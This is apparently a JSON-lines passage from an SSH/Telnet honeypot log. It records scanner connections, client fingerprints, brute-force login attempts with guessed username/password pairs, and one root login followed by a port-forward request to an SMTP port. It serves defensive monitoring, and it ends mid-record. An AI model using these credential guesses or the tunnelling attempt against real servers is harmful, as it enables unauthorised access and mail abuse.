{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T04:07:21.951351Z","src_ip":"212.227.125.160","session":"a6bbe1097fa0"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:07:29.693384Z","src_ip":"212.227.125.160","session":"a6bbe1097fa0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51590,"dst_ip":"1.2.3.4","dst_port":22,"session":"897a5532301e","protocol":"ssh","message":"New connection: 217.72.205.35:51590 (1.2.3.4:22) [session: 897a5532301e]","sensor":"my-vps","timestamp":"2025-08-28T04:08:02.425525Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:08:02.427513Z","src_ip":"217.72.205.35","session":"897a5532301e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.240.46","src_port":50810,"dst_ip":"1.2.3.4","dst_port":22,"session":"fda530b4f79b","protocol":"ssh","message":"New connection: 77.83.240.46:50810 (1.2.3.4:22) [session: fda530b4f79b]","sensor":"my-vps","timestamp":"2025-08-28T04:09:02.164187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:09:02.165295Z","src_ip":"77.83.240.46","session":"fda530b4f79b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T04:09:02.178646Z","src_ip":"77.83.240.46","session":"fda530b4f79b"}
{"eventid":"cowrie.login.failed","username":"loginuser","password":"p@ssw0rd","message":"login attempt [loginuser/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-28T04:09:02.221636Z","src_ip":"77.83.240.46","session":"fda530b4f79b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:09:03.239110Z","src_ip":"77.83.240.46","session":"fda530b4f79b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55380,"dst_ip":"1.2.3.4","dst_port":23,"session":"41f3ecdad30b","protocol":"telnet","message":"New connection: 212.227.125.160:55380 (1.2.3.4:23) [session: 41f3ecdad30b]","sensor":"my-vps","timestamp":"2025-08-28T04:09:54.996329Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41424,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f6d42efe34f","protocol":"ssh","message":"New connection: 212.227.235.229:41424 (1.2.3.4:22) [session: 0f6d42efe34f]","sensor":"my-vps","timestamp":"2025-08-28T04:10:04.905578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:10:04.906439Z","src_ip":"212.227.235.229","session":"0f6d42efe34f"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T04:10:05.115372Z","src_ip":"212.227.235.229","session":"0f6d42efe34f"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:10:12.905945Z","src_ip":"212.227.235.229","session":"0f6d42efe34f"}
{"eventid":"cowrie.session.closed","duration":30.608378171920776,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:10:25.603700Z","src_ip":"212.227.125.160","session":"41f3ecdad30b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59380,"dst_ip":"1.2.3.4","dst_port":22,"session":"accd6b8c4b53","protocol":"ssh","message":"New connection: 212.227.235.229:59380 (1.2.3.4:22) [session: accd6b8c4b53]","sensor":"my-vps","timestamp":"2025-08-28T04:10:25.750043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-28T04:10:26.517166Z","src_ip":"212.227.235.229","session":"accd6b8c4b53"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-28T04:10:27.556265Z","src_ip":"212.227.235.229","session":"accd6b8c4b53"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:10:34.534141Z","src_ip":"212.227.235.229","session":"accd6b8c4b53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56134,"dst_ip":"1.2.3.4","dst_port":22,"session":"5daa75136426","protocol":"ssh","message":"New connection: 212.227.235.229:56134 (1.2.3.4:22) [session: 5daa75136426]","sensor":"my-vps","timestamp":"2025-08-28T04:11:04.512262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T04:11:04.513113Z","src_ip":"212.227.235.229","session":"5daa75136426"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T04:11:04.638463Z","src_ip":"212.227.235.229","session":"5daa75136426"}
{"eventid":"cowrie.login.success","username":"root","password":"stfu_and_be_quite","message":"login attempt [root/stfu_and_be_quite] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:11:05.225023Z","src_ip":"212.227.235.229","session":"5daa75136426"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T04:11:05.351856Z","session":"5daa75136426"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T04:11:05.479375Z","src_ip":"212.227.235.229","session":"5daa75136426"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:11:05.606597Z","src_ip":"212.227.235.229","session":"5daa75136426"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59702,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4bb49bf0ecd","protocol":"ssh","message":"New connection: 212.227.125.160:59702 (1.2.3.4:22) [session: a4bb49bf0ecd]","sensor":"my-vps","timestamp":"2025-08-28T04:11:52.072160Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-28T04:11:53.067370Z","src_ip":"212.227.125.160","session":"a4bb49bf0ecd"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-28T04:11:53.876159Z","src_ip":"212.227.125.160","session":"a4bb49bf0ecd"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:12:00.841698Z","src_ip":"212.227.125.160","session":"a4bb49bf0ecd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47012,"dst_ip":"1.2.3.4","dst_port":22,"session":"8023aeb5fc6e","protocol":"ssh","message":"New connection: 212.227.235.229:47012 (1.2.3.4:22) [session: 8023aeb5fc6e]","sensor":"my-vps","timestamp":"2025-08-28T04:13:04.885057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:13:04.885795Z","src_ip":"212.227.235.229","session":"8023aeb5fc6e"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T04:13:04.990734Z","src_ip":"212.227.235.229","session":"8023aeb5fc6e"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-28T04:13:05.303683Z","src_ip":"212.227.235.229","session":"8023aeb5fc6e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:13:06.410294Z","src_ip":"212.227.235.229","session":"8023aeb5fc6e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56214,"dst_ip":"1.2.3.4","dst_port":22,"session":"5957e8a13e18","protocol":"ssh","message":"New connection: 217.72.205.35:56214 (1.2.3.4:22) [session: 5957e8a13e18]","sensor":"my-vps","timestamp":"2025-08-28T04:14:39.781040Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:14:39.782081Z","src_ip":"217.72.205.35","session":"5957e8a13e18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35058,"dst_ip":"1.2.3.4","dst_port":22,"session":"44d5f487541f","protocol":"ssh","message":"New connection: 212.227.125.160:35058 (1.2.3.4:22) [session: 44d5f487541f]","sensor":"my-vps","timestamp":"2025-08-28T04:16:13.356421Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55234,"dst_ip":"1.2.3.4","dst_port":22,"session":"3110e89d0ebf","protocol":"ssh","message":"New connection: 212.227.125.160:55234 (1.2.3.4:22) [session: 3110e89d0ebf]","sensor":"my-vps","timestamp":"2025-08-28T04:16:43.707538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T04:16:43.708301Z","src_ip":"212.227.125.160","session":"3110e89d0ebf"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T04:16:43.767649Z","src_ip":"212.227.125.160","session":"3110e89d0ebf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"callofduty","message":"login attempt [admin/callofduty] failed","sensor":"my-vps","timestamp":"2025-08-28T04:16:44.089039Z","src_ip":"212.227.125.160","session":"3110e89d0ebf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"cake","message":"login attempt [admin/cake] failed","sensor":"my-vps","timestamp":"2025-08-28T04:16:45.151327Z","src_ip":"212.227.125.160","session":"3110e89d0ebf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bunbun","message":"login attempt [admin/bunbun] failed","sensor":"my-vps","timestamp":"2025-08-28T04:16:46.213538Z","src_ip":"212.227.125.160","session":"3110e89d0ebf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bullwink","message":"login attempt [admin/bullwink] failed","sensor":"my-vps","timestamp":"2025-08-28T04:16:47.275694Z","src_ip":"212.227.125.160","session":"3110e89d0ebf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"brunette","message":"login attempt [admin/brunette] failed","sensor":"my-vps","timestamp":"2025-08-28T04:16:48.337480Z","src_ip":"212.227.125.160","session":"3110e89d0ebf"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:16:49.398795Z","src_ip":"212.227.125.160","session":"3110e89d0ebf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56058,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1f250810a09","protocol":"ssh","message":"New connection: 212.227.235.229:56058 (1.2.3.4:22) [session: b1f250810a09]","sensor":"my-vps","timestamp":"2025-08-28T04:16:57.597192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T04:16:57.598200Z","src_ip":"212.227.235.229","session":"b1f250810a09"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","ae